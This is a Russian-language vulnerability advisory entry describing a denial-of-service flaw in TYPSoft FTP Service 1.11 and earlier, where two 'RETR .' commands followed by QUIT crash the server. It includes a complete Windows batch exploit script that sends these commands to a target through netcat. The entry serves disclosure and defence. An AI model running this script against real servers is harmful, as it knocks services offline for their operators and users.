Дата публикации: | 01.09.2004 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 1095 |
Опасность: | Средняя |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: TYPSoft FTP Service 1.11 и более ранние версии
Описание: Уязвимость обнаружена в TYPSoft FTP server. Удаленный авторизованный пользователь может вызвать условия отказа в обслуживании на целевом сервере. Удаленный авторизованный пользователем (включая анонимного пользователя) может выполнить две последовательных команды "RETR .", за которыми следует команда "QUIT", чтобы вызвать условия отказа в обслуживании на целевом FTP сервере. Пример/Эксплоит: @echo off if '%3'=='' echo Usage:%0 target ^<UserName^> ^<PassWord^> [port]&goto :eof set FTPUSER=%2 set FTPPWD=%3 set PORT=21 if not '%4'=='' set PORT=%4 for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe echo Need nc.exe&goto :eof echo USER %FTPUSER%>ftp.cmd echo PASS %FTPPWD%>>ftp.cmd echo RETR .>>ftp.cmd echo RETR .>>ftp.cmd echo QUIT>>ftp.cmd nc -v %1 %PORT%<ftp.cmd del ftp.cmd URL производителя:http://en.typsoft.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | DOS@TFS |